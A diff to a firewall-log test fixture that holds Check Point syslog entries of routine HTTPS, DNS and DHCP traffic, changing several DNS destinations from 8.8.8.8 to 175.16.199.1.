 <134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"209.87.209.101"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35154"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"209.87.209.101"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35156"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501150"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44839"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501150"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44839"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.35"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49550"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.110"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42270"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"209.87.209.101"; log_delay:"1585501150"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35162"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501150"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38362"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501150"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38362"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"194.29.39.47"; log_delay:"1585501150"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33744"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:17Z gw-da58d3 CheckPoint 1930 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3e6,0x0,0x6401a8c0,0x3c7878a}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T16:59:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3e5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"67"; service:"68"; service_id:"dhcp-rep-localmodule"; src:"192.168.1.1"]
@@ -1859,7 +1859,7 @@
 <134>1 2020-03-29T16:59:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3e5,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64032"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3e8,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57641"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3e8,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63679"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:59:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ed,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62590"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T16:59:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ed,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62590"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ed,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64193"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ed,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45685"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ee,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -1875,12 +1875,12 @@
 <134>1 2020-03-29T16:59:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3f0,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50073"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:59:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3f1,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50074"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:59:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3f1,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50075"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T16:59:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3f2,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44075"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T16:59:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3f2,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44075"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3f5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62639"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:59:43Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3fe,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54421"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:59:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d400,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501184"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54376"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d400,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501184"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54376"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d400,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"34.215.75.150"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37726"; service:"443"; service_id:"https"; src:"192.168.2.2"]
